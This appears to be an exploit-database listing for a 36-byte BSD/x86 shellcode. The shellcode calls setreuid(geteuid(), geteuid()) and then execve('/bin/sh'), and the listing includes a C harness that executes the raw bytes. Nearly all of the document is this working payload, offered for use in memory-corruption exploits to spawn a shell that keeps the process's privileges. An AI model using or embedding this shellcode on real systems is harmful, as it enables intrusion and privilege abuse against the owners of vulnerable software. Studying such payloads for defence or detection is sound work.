[] NeoSense
E X P L O I T S
title author type platform port cve id

BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)

Author: Jihyeog Lim
type: 
platform: bsd_x86
port: 36.0
date_added: 2018-01-10 
date_updated: 2018-01-10 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
/*
 * bsd/x86 setreuid/exec shellcode
 *
 * setreuid(geteuid(), geteuid()) and execve("/bin/sh", "/bin/sh", 0)
 * shellcode based on hkpco's setreuid/exec shellcode for linux
 * Tested on FreeBSD
*/

#include <stdio.h>
#include <string.h>

char shellcode[] =
 "\x31\xc0\xb0\x19\x50\xcd\x80\x50"
 "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuid(geteuid(), getuid());
 "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
 "\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
 "\xee\xff\xff\xff/bin/sh"; // exec(/bin/sh)

int main()
{
int (*f)() = (int (*)())shellcode;
 printf("%d\n",strlen(shellcode));
f();
 return 0;
}
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.